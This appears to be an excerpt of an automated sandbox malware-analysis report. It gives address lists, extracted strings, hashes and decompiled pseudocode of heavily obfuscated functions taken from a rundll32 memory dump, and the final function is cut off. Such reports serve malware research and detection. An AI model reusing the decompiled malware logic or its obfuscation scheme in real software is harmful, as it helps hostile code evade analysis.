0x0020e5e0
0x0020e5e4
0x0020e5ec
0x0020e5f4
0x0020e5fc
0x0020e604
0x0020e609
0x0020e611
0x0020e619
0x0020e626
0x0020e62a
0x0020e62e
0x0020e633
0x0020e63b
0x0020e643
0x0020e64b
0x0020e653
0x0020e65b
0x0020e663
0x0020e66b
0x0020e673
0x0020e680
0x0020e684
0x0020e68c
0x0020e697
0x0020e6a2
0x0020e6ad
0x0020e6b8
0x0020e6c3
0x0020e6ce
0x0020e6d6
0x0020e6de
0x0020e6e3
0x0020e6eb
0x0020e6f6
0x0020e701
0x0020e70c
0x0020e717
0x0020e71e
0x0020e729
0x0020e731
0x0020e739
0x0020e742
0x0020e746
0x0020e74e
0x0020e75b
0x0020e75f
0x0020e767
0x0020e76f
0x0020e777
0x0020e77f
0x0020e787
0x0020e78f
0x0020e79a
0x0020e7a5
0x0020e7b0
0x0020e7bb
0x0020e7c3
0x0020e7ce
0x0020e7d6
0x0020e7e4
0x0020e7e8
0x0020e7ed
0x0020e7f5
0x0020e7fd
0x0020e802
0x0020e809
0x0020e816
0x0020e81e
0x0020e823
0x0020e831
0x0020e834
0x0020e838
0x0020e840
0x0020e84b
0x0020e856
0x0020e861
0x0020e86c
0x0020e877
0x0020e882
0x0020e88a
0x0020e88f
0x0020e894
0x0020e89c
0x0020e8a7
0x0020e8b2
0x0020e8bd
0x0020e8c8
0x0020e8d3
0x0020e8de
0x0020e8e6
0x0020e8eb
0x0020e8f0
0x0020e8f0
0x0020e8f5
0x0020e8f5
0x0020e8f5
0x0020e8f5
0x0020e8fb
0x00000000
0x00000000
0x0020e901
0x0020ea28
0x0020ea29
0x0020ea2e
0x0020ea33
0x0020ea36
0x0020ea3c
0x00000000
0x0020ea3c
0x0020e907
0x0020e90d
0x0020e9f3
0x0020e9fd
0x0020ea02
0x0020ea07
0x0020ebf8
0x0020ea0d
0x0020ea0d
0x00000000
0x0020ea0d
0x0020e913
0x0020e915
0x0020e9b6
0x0020e9bb
0x0020e9c1
0x0020e9c2
0x00000000
0x0020e91b
0x0020e921
0x0020e98c
0x0020e997
0x0020e99d
0x0020e99e
0x00000000
0x0020e923
0x0020e929
0x0020ebec
0x0020e92f
0x0020e935
0x00000000
0x0020e93b
0x0020e940
0x0020e957
0x0020e95b
0x0020e960
0x0020e967
0x0020e96f
0x00000000
0x0020e96f
0x0020e935
0x0020e929
0x0020e921
0x0020e915
0x0020e90d
0x0020ebf9
0x0020ec05
0x0020ec05
0x0020ea4c
0x0020eb79
0x0020eb96
0x0020eba4
0x0020eba9
0x0020ebae
0x0020ebba
0x00000000
0x0020ebb0
0x0020ebb0
0x00000000
0x0020ebb0
0x0020ea52
0x0020ea58
0x0020eb3e
0x0020eb5c
0x0020eb60
0x0020eb68
0x0020eb6a
0x0020eb6f
0x00000000
0x0020ea5e
0x0020ea64
0x0020eaeb
0x0020eaf5
0x0020eafb
0x0020eafc
0x00000000
0x0020ea66
0x0020ea6c
0x00000000
0x0020ea72
0x0020ea72
0x0020ea85
0x0020eabe
0x0020eac3
0x0020eaca
0x0020ead2
0x00000000
0x0020ead2
0x0020ea6c
0x0020ea64
0x0020ea58
0x00000000
0x0020ebbf
0x0020ebbf
0x00000000

Strings

.Y, xrefs: 0020E5D0
fA, xrefs: 0020E809
C=wU, xrefs: 0020E787
m2, xrefs: 0020E35A
'd, xrefs: 0020E78F
C, xrefs: 0020E8D3
mO, xrefs: 0020E856
g0, xrefs: 0020E260
^*, xrefs: 0020E21C
H, xrefs: 0020E4E8
q, xrefs: 0020E894
d/Q, xrefs: 0020E1DA
&o, xrefs: 0020E53C
!$, xrefs: 0020E74E
fC, xrefs: 0020E4DD
0vz5, xrefs: 0020E40E
W}, xrefs: 0020E385

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$!$$&o$'d$.Y$0vz5$C=wU$H$W}$^*$d/Q$fA$fC$g0$m2$mO$C
API String ID: 0-3046912973
Opcode ID: d173fac045f389c4ee21ed904a9f41e626406d3ba5fa650458505f1986503ca2
Instruction ID: a209faa17fff52f3c570d66ddf1434c1fec5876c4bb51d654b9ec63b7ea96158
Opcode Fuzzy Hash: d173fac045f389c4ee21ed904a9f41e626406d3ba5fa650458505f1986503ca2
Instruction Fuzzy Hash: B8322771508381DFE3A8CF65C94AA9BBBE1FBC4704F108A0DE5C9962A1D7B58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002AD713, Relevance: 21.7, Strings: 17, Instructions: 470COMMON

Download Yara Rule

Strings

fA, xrefs: 002ADD7D
C=wU, xrefs: 002ADCFB
W}, xrefs: 002AD8F9
q, xrefs: 002ADE08
'd, xrefs: 002ADD03
H, xrefs: 002ADA5C
m2, xrefs: 002AD8CE
g0, xrefs: 002AD7D4
C, xrefs: 002ADE47
.Y, xrefs: 002ADB44
!$, xrefs: 002ADCC2
mO, xrefs: 002ADDCA
&o, xrefs: 002ADAB0
d/Q, xrefs: 002AD74E
^*, xrefs: 002AD790
fC, xrefs: 002ADA51
0vz5, xrefs: 002AD982

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: q$!$$&o$'d$.Y$0vz5$C=wU$H$W}$^*$d/Q$fA$fC$g0$m2$mO$C
API String ID: 0-3046912973
Opcode ID: 59d873948cf6e53616444cd496ad51a4035996c647f55f630e181127c804da2c
Instruction ID: ed5ddb1eaca89a835014184c3b1d12201ee131e05068c428e6ffcdd9d6b0e0f3
Opcode Fuzzy Hash: 59d873948cf6e53616444cd496ad51a4035996c647f55f630e181127c804da2c
Instruction Fuzzy Hash: AF324671518380DFE3A8CF65C98AA4BBBE1FBD5704F108A0DE5C9962A0D7B58918CF43

Uniqueness

Uniqueness Score: -1.00%

Function 001F7E34, Relevance: 21.7, Strings: 17, Instructions: 464
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E001F7E34(intOrPtr __ecx, intOrPtr __edx) {
				char _v524;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				unsigned int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _v704;
				signed int _v708;
				signed int _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				void* _t497;
				intOrPtr _t500;
				intOrPtr _t502;
				intOrPtr _t505;
				void* _t510;
				intOrPtr _t514;
				intOrPtr _t516;
				intOrPtr _t524;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed int _t532;
				signed int _t533;
				signed int _t534;
				signed int _t535;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				void* _t541;
				void* _t543;
				signed int _t598;
				intOrPtr _t599;
				signed int _t600;
				intOrPtr _t604;
				signed int* _t605;
				signed int* _t606;
				void* _t611;

				_t605 =  &_v732;
				_v548 = _v548 & 0x00000000;
				_v608 = 0x8e77;
				_v544 = __edx;
				_t604 = __ecx;
				_t600 = 0xf92d88;
				_t598 = 0x7f;
				_v608 = _v608 / _t598;
				_v608 = _v608 ^ 0x0200011f;
				_v664 = 0x5ee6;
				_v664 = _v664 >> 6;
				_t527 = 0x74;
				_v664 = _v664 * 0x3a;
				_v664 = _v664 ^ 0x00004336;
				_v724 = 0x97d5;
				_v724 = _v724 / _t527;
				_v724 = _v724 | 0x73d16624;
				_t528 = 0x48;
				_v724 = _v724 / _t528;
				_v724 = _v724 ^ 0x019bc567;
				_v684 = 0xe6c9;
				_v684 = _v684 << 4;
				_t529 = 0x2a;
				_v684 = _v684 / _t529;
				_t530 = 0xc;
				_v684 = _v684 * 0x45;
				_v684 = _v684 ^ 0x0017da0f;
				_v596 = 0x84c3;
				_v596 = _v596 >> 0xc;
				_v596 = _v596 ^ 0x00000094;
				_v716 = 0x73cc;
				_v716 = _v716 >> 5;
				_v716 = _v716 * 0x51;
				_v716 = _v716 + 0xffff7ccf;
				_v716 = _v716 ^ 0x000099a4;
				_v700 = 0xc2fe;
				_v700 = _v700 | 0x0147ff89;
				_v700 = _v700 >> 2;
				_v700 = _v700 + 0xffffed96;
				_v700 = _v700 ^ 0x0051cc5f;
				_v624 = 0x598b;
				_v624 = _v624 * 0x46;
				_v624 = _v624 / _t530;
				_v624 = _v624 ^ 0x00023e05;
				_v560 = 0x1a77;
				_v560 = _v560 / _t598;
				_v560 = _v560 ^ 0x000017c3;
				_v640 = 0x468b;
				_v640 = _v640 ^ 0xf8cef0f9;
				_v640 = _v640 ^ 0x157598e1;
				_v640 = _v640 ^ 0xedbb3f55;
				_v660 = 0x95cb;
				_v660 = _v660 ^ 0xe0385738;
				_t103 =  &_v660; // 0xe0385738
				_t531 = 0x34;
				_v660 =  *_t103 * 0x38;
				_v660 = _v660 ^ 0x0c6ae6d8;
				_v692 = 0x21c1;
				_v692 = _v692 / _t531;
				_t532 = 0x70;
				_v692 = _v692 * 0x25;
				_v692 = _v692 << 4;
				_v692 = _v692 ^ 0x00016ad5;
				_v592 = 0xa9db;
				_v592 = _v592 ^ 0x5846e700;
				_v592 = _v592 ^ 0x584631e9;
				_v600 = 0x3eca;
				_v600 = _v600 + 0x9bab;
				_v600 = _v600 ^ 0x0000ec74;
				_v672 = 0x247b;
				_v672 = _v672 + 0xffff7cea;
				_v672 = _v672 + 0xffff49cc;
				_v672 = _v672 ^ 0xfffef3f1;
				_v720 = 0x5bb8;
				_v720 = _v720 << 5;
				_v720 = _v720 << 0xe;
				_v720 = _v720 * 0x69;
				_v720 = _v720 ^ 0xf3c05410;
				_v604 = 0x12e;
				_v604 = _v604 ^ 0xcbcc0f39;
				_v604 = _v604 ^ 0xcbcc0717;
				_v676 = 0x4f1f;
				_v676 = _v676 + 0xffffd823;
				_v676 = _v676 ^ 0x00001628;
				_v668 = 0xa101;
				_v668 = _v668 / _t532;
				_v668 = _v668 << 7;
				_v668 = _v668 ^ 0x0000d0e8;
				_v712 = 0xf562;
				_v712 = _v712 + 0xe29d;
				_v712 = _v712 | 0xaf029352;
				_t533 = 0x2c;
				_v712 = _v712 / _t533;
				_v712 = _v712 ^ 0x03fa2878;
				_v584 = 0xa7c6;
				_v584 = _v584 ^ 0x2308cfbe;
				_v584 = _v584 ^ 0x23086838;
				_v696 = 0xba3e;
				_v696 = _v696 << 9;
				_v696 = _v696 ^ 0x7a641ee8;
				_v696 = _v696 >> 2;
				_v696 = _v696 ^ 0x1ec44f4b;
				_v568 = 0x7d1;
				_v568 = _v568 << 2;
				_v568 = _v568 ^ 0x00007750;
				_v704 = 0x3590;
				_v704 = _v704 * 0x4c;
				_v704 = _v704 << 2;
				_v704 = _v704 << 8;
				_v704 = _v704 ^ 0x3f9b76a0;
				_v576 = 0x6e4c;
				_v576 = _v576 << 8;
				_v576 = _v576 ^ 0x006e4c78;
				_v636 = 0xe1b3;
				_t534 = 0x38;
				_v636 = _v636 / _t534;
				_v636 = _v636 | 0xbc23d7c2;
				_v636 = _v636 ^ 0xbc23f6d4;
				_v644 = 0xc193;
				_v644 = _v644 + 0xffffe081;
				_v644 = _v644 | 0xe7ea23f6;
				_v644 = _v644 ^ 0xe7eab5c6;
				_v652 = 0xff18;
				_v652 = _v652 ^ 0x15e6b590;
				_v652 = _v652 | 0x9145bae2;
				_v652 = _v652 ^ 0x95e7a511;
				_v688 = 0x91dc;
				_v688 = _v688 << 0xf;
				_v688 = _v688 + 0xffffec69;
				_v688 = _v688 + 0x152;
				_v688 = _v688 ^ 0x48ede9e6;
				_v588 = 0xda26;
				_t535 = 0x43;
				_v588 = _v588 / _t535;
				_v588 = _v588 ^ 0x00003ef3;
				_v728 = 0x13e1;
				_v728 = _v728 << 5;
				_v728 = _v728 | 0x81597e77;
				_t536 = 0x67;
				_v728 = _v728 / _t536;
				_v728 = _v728 ^ 0x0141a54f;
				_v732 = 0xfe77;
				_v732 = _v732 ^ 0xa2bc77b9;
				_v732 = _v732 << 0xb;
				_t537 = 0x3d;
				_v732 = _v732 * 0x1f;
				_v732 = _v732 ^ 0xa57fc270;
				_v564 = 0xd716;
				_v564 = _v564 ^ 0x4072510d;
				_v564 = _v564 ^ 0x40729e8d;
				_v708 = 0xf6c2;
				_v708 = _v708 + 0xffff713e;
				_v708 = _v708 * 0xe;
				_v708 = _v708 / _t537;
				_v708 = _v708 ^ 0x00002963;
				_v580 = 0x83ac;
				_t538 = 0x4a;
				_v580 = _v580 / _t538;
				_v580 = _v580 ^ 0x000067e0;
				_v632 = 0xd307;
				_v632 = _v632 >> 0xb;
				_v632 = _v632 ^ 0x73d3f358;
				_v632 = _v632 ^ 0x73d3bdee;
				_v656 = 0x12d9;
				_v656 = _v656 | 0x78eb2603;
				_v656 = _v656 + 0xffffb5b9;
				_v656 = _v656 ^ 0x78eaf389;
				_v552 = 0x5776;
				_v552 = _v552 + 0x2f24;
				_v552 = _v552 ^ 0x00009a22;
				_v616 = 0x2c00;
				_v616 = _v616 + 0x792b;
				_v616 = _v616 + 0xffffa094;
				_v616 = _v616 ^ 0x00000aad;
				_v572 = 0x3f59;
				_v572 = _v572 | 0xe3450093;
				_v572 = _v572 ^ 0xe3451fd2;
				_v556 = 0x6ea6;
				_t539 = 0x1d;
				_t524 = _v544;
				_v556 = _v556 * 0x56;
				_v556 = _v556 ^ 0x002547d9;
				_v648 = 0xf811;
				_v648 = _v648 << 8;
				_v648 = _v648 ^ 0xcc5c85c7;
				_v648 = _v648 ^ 0xcca4883c;
				_v612 = 0xcfc1;
				_t599 = _v544;
				_v612 = _v612 * 0x33;
				_v612 = _v612 >> 1;
				_v612 = _v612 ^ 0x0014c5bf;
				_v620 = 0x3b04;
				_v620 = _v620 >> 3;
				_v620 = _v620 ^ 0x957054e4;
				_v620 = _v620 ^ 0x95705ef6;
				_v628 = 0x17ec;
				_v628 = _v628 / _t539;
				_v628 = _v628 + 0xffffc55c;
				_v628 = _v628 ^ 0xffffc912;
				_v680 = 0x1f47;
				_v680 = _v680 | 0x8760986b;
				_t540 = 0x6b;
				_v680 = _v680 / _t540;
				_v680 = _v680 + 0xeba5;
				_v680 = _v680 ^ 0x0144ccb9;
				while(1) {
					L1:
					_t497 = 0x22698256;
					while(1) {
						L2:
						_t541 = 0x37da4205;
						do {
							while(1) {
								L3:
								_t611 = _t600 - 0x1571d90b;
								if(_t611 > 0) {
									break;
								}
								if(_t611 == 0) {
									_t510 = E001F934C(_t541);
									__eflags = _t510 - E00204DBD();
									_t497 = 0x22698256;
									_t600 = 0x695d68;
									_t524 =  !=  ? 0x22698256 : 0xbd09969;
									while(1) {
										L2:
										_t541 = 0x37da4205;
										goto L3;
									}
								}
								if(_t600 == 0x695d68) {
									__eflags = _t524 - _t497;
									if(_t524 != _t497) {
										_t600 = 0xd0bbcc0;
										continue;
									} else {
										_push(_v608);
										E001F4BDE(_v716, _v700,  &_v548, _v624, _t541);
										_t605 =  &(_t605[5]);
										asm("sbb esi, esi");
										_t600 = (_t600 & 0xff859553) + 0xd86276d;
										while(1) {
											L1:
											_t497 = 0x22698256;
											L2:
											_t541 = 0x37da4205;
											goto L3;
										}
									}
									L34:
								}
								if(_t600 != 0xf92d88) {
									if(_t600 == 0xd0bbcc0) {
										_push( &_v524);
										_push(0x1f1318);
										_t516 = E001F2628(_t604, _v544);
										__eflags = _t516;
										_t497 = 0x22698256;
										if(_t516 == 0) {
											__eflags = _t524 - 0x22698256;
											if(_t524 == 0x22698256) {
												E001F78F0(_v548, _v560, _v640, _v660, _v692);
												_t605 =  &(_t605[3]);
												_t497 = 0x22698256;
											}
											_t600 = 0xd86276d;
											goto L2;
										} else {
											__eflags = _t524 - 0x22698256;
											_t541 = 0x37da4205;
											_t600 =  ==  ? 0x37da4205 : 0x39310db5;
											continue;
										}
									} else {
										if(_t600 == 0xd86276d) {
											return E001F91CD(_v612, _v620, _v628, _t599, _v680);
										}
										goto L30;
									}
								}
								_push(_t541);
								_t543 = 0x24;
								_t514 = E002057E8(_t543);
								_t599 = _t514;
								__eflags = _t599;
								if(_t599 != 0) {
									_t600 = 0x1571d90b;
									while(1) {
										L1:
										_t497 = 0x22698256;
										goto L2;
									}
								}
								return _t514;
								goto L34;
							}
							__eflags = _t600 - _t541;
							if(_t600 == _t541) {
								_t500 = E0020D530(_v592,  &_v524, _v600, _v672,  &_v540, _v720, _v548, _v604);
								_t606 =  &(_t605[8]);
								__eflags = _t500;
								if(_t500 != 0) {
									E001F78F0(_v540, _v676, _v668, _v712, _v584);
									E001F78F0(_v536, _v696, _v568, _v704, _v576);
									_t606 =  &(_t606[6]);
								}
								E001F78F0(_v548, _v636, _v644, _v652, _v688);
								_t605 =  &(_t606[3]);
								_t600 = 0x38dc6618;
								_t497 = 0x22698256;
								_t541 = 0x37da4205;
								goto L30;
							} else {
								__eflags = _t600 - 0x38dc6618;
								if(_t600 == 0x38dc6618) {
									 *((intOrPtr*)(_t599 + 0x20)) = _t604;
									_t502 =  *0x211400; // 0x0
									 *((intOrPtr*)(_t599 + 0x10)) = _t502;
									 *0x211400 = _t599;
									return _t502;
								}
								__eflags = _t600 - 0x39310db5;
								if(__eflags != 0) {
									goto L30;
								} else {
									_push(_v708);
									_push(0);
									_push(0);
									_push(_t541);
									_push(_v564);
									_push(_v732);
									_push( &_v524);
									_push( &_v540);
									_t505 = E002089F6(_v588, _v728, __eflags);
									_t605 =  &(_t605[8]);
									__eflags = _t505;
									if(_t505 != 0) {
										E001F78F0(_v540, _v580, _v632, _v656, _v552);
										E001F78F0(_v536, _v616, _v572, _v556, _v648);
										_t605 =  &(_t605[6]);
									}
									_t600 = 0x38dc6618;
									goto L1;
								}
							}
							goto L34;
							L30:
							__eflags = _t600 - 0x2870efef;
						} while (_t600 != 0x2870efef);
						return _t497;
					}
				}
			}

0x001f7e34
0x001f7e3a
0x001f7e42
0x001f7e52
0x001f7e59
0x001f7e5d
0x001f7e64
0x001f7e69
0x001f7e70
0x001f7e7b
0x001f7e83
0x001f7e8f
0x001f7e92
0x001f7e96
0x001f7e9e
0x001f7eae
0x001f7eb2
0x001f7ebe
0x001f7ec3
0x001f7ec7
0x001f7ecf
0x001f7ed7
0x001f7ee2
0x001f7ee7
0x001f7ef2
0x001f7ef3
0x001f7ef7
0x001f7eff
0x001f7f0a
0x001f7f12
0x001f7f1d
0x001f7f25
0x001f7f2f
0x001f7f33
0x001f7f3b
0x001f7f43
0x001f7f4b
0x001f7f53
0x001f7f58
0x001f7f60
0x001f7f68
0x001f7f75
0x001f7f81
0x001f7f85
0x001f7f8d
0x001f7fa1
0x001f7fa8
0x001f7fb3
0x001f7fbb
0x001f7fc3
0x001f7fcb
0x001f7fd3
0x001f7fdd
0x001f7fe5
0x001f7fec
0x001f7fef
0x001f7ff3
0x001f7ffb
0x001f800b
0x001f8014
0x001f8017
0x001f801b
0x001f8020
0x001f8028
0x001f8033
0x001f803e
0x001f8049
0x001f8054
0x001f805f
0x001f806a
0x001f8072
0x001f807a
0x001f8082
0x001f808a
0x001f8092
0x001f8097
0x001f80a1
0x001f80a5
0x001f80ad
0x001f80b8
0x001f80c3
0x001f80ce
0x001f80d6
0x001f80e6
0x001f80ee
0x001f80fe
0x001f8102
0x001f8107
0x001f810f
0x001f8117
0x001f811f
0x001f812b
0x001f812e
0x001f8132
0x001f813a
0x001f8145
0x001f8150
0x001f815b
0x001f8163
0x001f8168
0x001f8170
0x001f8175
0x001f817d
0x001f8188
0x001f8190
0x001f819b
0x001f81a8
0x001f81ac
0x001f81b1
0x001f81b6
0x001f81be
0x001f81c9
0x001f81d1
0x001f81dc
0x001f81ec
0x001f81f1
0x001f81f7
0x001f81ff
0x001f8207
0x001f820f
0x001f8217
0x001f821f
0x001f8227
0x001f822f
0x001f8237
0x001f823f
0x001f8247
0x001f824f
0x001f8254
0x001f825c
0x001f8264
0x001f826c
0x001f827e
0x001f8283
0x001f828c
0x001f8297
0x001f829f
0x001f82a4
0x001f82b0
0x001f82b5
0x001f82bb
0x001f82c3
0x001f82cb
0x001f82d3
0x001f82dd
0x001f82e0
0x001f82e4
0x001f82ec
0x001f82f7
0x001f8302
0x001f830d
0x001f8315
0x001f8322
0x001f832e
0x001f8332
0x001f833a
0x001f834c
0x001f834f
0x001f8356
0x001f8361
0x001f8369
0x001f836e
0x001f8376
0x001f837e
0x001f8386
0x001f838e
0x001f8396
0x001f839e
0x001f83a9
0x001f83b4
0x001f83bf
0x001f83ca
0x001f83d5
0x001f83e0
0x001f83eb
0x001f83f8
0x001f8403
0x001f840e
0x001f8423
0x001f8426
0x001f842d
0x001f8434
0x001f843f
0x001f8447
0x001f844c
0x001f8454
0x001f845c
0x001f846f
0x001f8476
0x001f847d
0x001f8484
0x001f848f
0x001f849a
0x001f84a2
0x001f84ad
0x001f84b8
0x001f84c8
0x001f84cc
0x001f84d4
0x001f84dc
0x001f84e4
0x001f84f0
0x001f84f3
0x001f84f7
0x001f84ff
0x001f8507
0x001f8507
0x001f8507
0x001f850c
0x001f850c
0x001f850c
0x001f8511
0x001f8511
0x001f8511
0x001f8511
0x001f8517
0x00000000
0x00000000
0x001f851d
0x001f8660
0x001f866c
0x001f8673
0x001f8678
0x001f867d
0x001f850c
0x001f850c
0x001f850c
0x00000000
0x001f850c
0x001f850c
0x001f8529
0x001f860b
0x001f860d
0x001f864b
0x00000000
0x001f860f
0x001f860f
0x001f862e
0x001f8633
0x001f8638
0x001f8640
0x001f8507
0x001f8507
0x001f8507
0x001f850c
0x001f850c
0x00000000
0x001f850c
0x001f8507
0x00000000
0x001f860d
0x001f8535
0x001f8541
0x001f8584
0x001f8585
0x001f858c
0x001f8592
0x001f8594
0x001f859a
0x001f85b0
0x001f85b2
0x001f85ce
0x001f85d3
0x001f85d6
0x001f85d6
0x001f85db
0x00000000
0x001f859c
0x001f859c
0x001f85a3
0x001f85a8
0x00000000
0x001f85a8
0x001f8543
0x001f8549
0x00000000
0x001f856e
0x00000000
0x001f8549
0x001f8541
0x001f85ed
0x001f85f0
0x001f85f1
0x001f85f6
0x001f85f9
0x001f85fb
0x001f8601
0x001f8507
0x001f8507
0x001f8507
0x00000000
0x001f8507
0x001f8507
0x001f8815
0x00000000
0x001f8815
0x001f8685
0x001f8687
0x001f876b
0x001f8770
0x001f8773
0x001f8775
0x001f8791
0x001f87b6
0x001f87bb
0x001f87bb
0x001f87d5
0x001f87da
0x001f87dd
0x001f87e2
0x001f87e7
0x00000000
0x001f868d
0x001f868d
0x001f8693
0x001f87fa
0x001f87fd
0x001f8802
0x001f8805
0x00000000
0x001f8805
0x001f8699
0x001f869f
0x00000000
0x001f86a5
0x001f86a5
0x001f86b0
0x001f86b2
0x001f86b4
0x001f86b5
0x001f86bc
0x001f86cb
0x001f86d3
0x001f86d4
0x001f86d9
0x001f86dc
0x001f86de
0x001f86fd
0x001f8725
0x001f872a
0x001f872a
0x001f872d
0x00000000
0x001f872d
0x001f869f
0x00000000
0x001f87ec
0x001f87ec
0x001f87ec
0x00000000
0x001f8511
0x001f850c

Strings

8W8, xrefs: 001F7FE5
t, xrefs: 001F805F
xLn, xrefs: 001F81D1
p(, xrefs: 001F87EC
g, xrefs: 001F8356
Y?, xrefs: 001F83EB
$/, xrefs: 001F83A9
1FX, xrefs: 001F803E
Pw, xrefs: 001F8190
{$, xrefs: 001F806A
+y, xrefs: 001F83CA
c), xrefs: 001F8332
^, xrefs: 001F7E7B
Qr@, xrefs: 001F82F7
h]i, xrefs: 001F8678
h]i, xrefs: 001F8523
H, xrefs: 001F8264

Memory Dump Source

Source File: 00000007.00000002.2091592236.00000000001F0000.00000040.00020000.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000007.00000002.2091646859.0000000000211000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2091654624.0000000000213000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qr@$$/$+y$8W8$Pw$Y?$c)$h]i$h]i$t$xLn${$$1FX$^$g$p($H
API String ID: 0-1563294895
Opcode ID: a4cc5f24b6b63af523e72be3531677bbb7a0929307f4e4072e915821f4edd98a
Instruction ID: 7b0bbaf6266d555951f1abdc80610eb4827b975a673b4e29fb638d16610afbe3
Opcode Fuzzy Hash: a4cc5f24b6b63af523e72be3531677bbb7a0929307f4e4072e915821f4edd98a
Instruction Fuzzy Hash: 7A32017250D3818FE368CF25C949A9BFBE1BBC5708F10891DE6D9962A0D7B58909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002973A8, Relevance: 21.7, Strings: 17, Instructions: 464COMMON

Download Yara Rule

Strings

p(, xrefs: 00297D60
h]i, xrefs: 00297BEC
H, xrefs: 002977D8
8W8, xrefs: 00297559
Qr@, xrefs: 0029786B
+y, xrefs: 0029793E
t, xrefs: 002975D3
Pw, xrefs: 00297704
c), xrefs: 002978A6
$/, xrefs: 0029791D
xLn, xrefs: 00297745
{$, xrefs: 002975DE
g, xrefs: 002978CA
h]i, xrefs: 00297A97
1FX, xrefs: 002975B2
Y?, xrefs: 0029795F
^, xrefs: 002973EF

Memory Dump Source

Source File: 00000007.00000002.2092161485.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Qr@$$/$+y$8W8$Pw$Y?$c)$h]i$h]i$t$xLn${$$1FX$^$g$p($H
API String ID: 0-1563294895
Opcode ID: cbd39f05def6fae6cacf81b6077f474a8bf22b7b1b6640ef28b62f0c0ef3e867
Instruction ID: d69caacb0f3a93fc168cd61dac0e67edab6e9ae2e75be01cd0de51ec75f30bb7
Opcode Fuzzy Hash: cbd39f05def6fae6cacf81b6077f474a8bf22b7b1b6640ef28b62f0c0ef3e867
Instruction Fuzzy Hash: 5F32317251C381CFE728CF25C949A8BBBE2BBC5704F10891DE6D9962A0D7B48919CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0020F411, Relevance: 20.4, Strings: 16, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0020F411() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				intOrPtr _v1568;
				char _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				unsigned int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t493;
				signed int _t495;
				signed int _t497;
				void* _t499;
				void* _t505;
				signed int _t516;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t521;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				void* _t530;
				void* _t533;
				void* _t539;
				void* _t581;
				signed int* _t586;

				_t586 =  &_v1764;
				_v1568 = 0x6bc4b7;
				_v1564 = 0;
				_v1616 = 0x7b31;
				_v1616 = _v1616 >> 5;
				_v1616 = _v1616 ^ 0x000003f0;
				_v1636 = 0x8aee;
				_v1636 = _v1636 << 6;
				_v1636 = _v1636 ^ 0xb9ff3183;
				_v1636 = _v1636 ^ 0x39dd8a02;
				_v1756 = 0x620;
				_v1756 = _v1756 | 0x6d559036;
				_v1756 = _v1756 << 8;
				_v1576 = 0;
				_t581 = 0x3875c21b;
				_t519 = 0x48;
				_v1756 = _v1756 / _t519;
				_v1756 = _v1756 ^ 0x01304efa;
				_v1684 = 0x5cfd;
				_t520 = 0x36;
				_v1684 = _v1684 * 0x52;
				_v1684 = _v1684 * 0x24;
				_v1684 = _v1684 ^ 0x04302f49;
				_v1628 = 0x396e;
				_v1628 = _v1628 * 0x28;
				_v1628 = _v1628 ^ 0x0008c3d7;
				_v1696 = 0x5408;
				_v1696 = _v1696 >> 0xc;
				_v1696 = _v1696 << 0xe;
				_v1696 = _v1696 << 1;
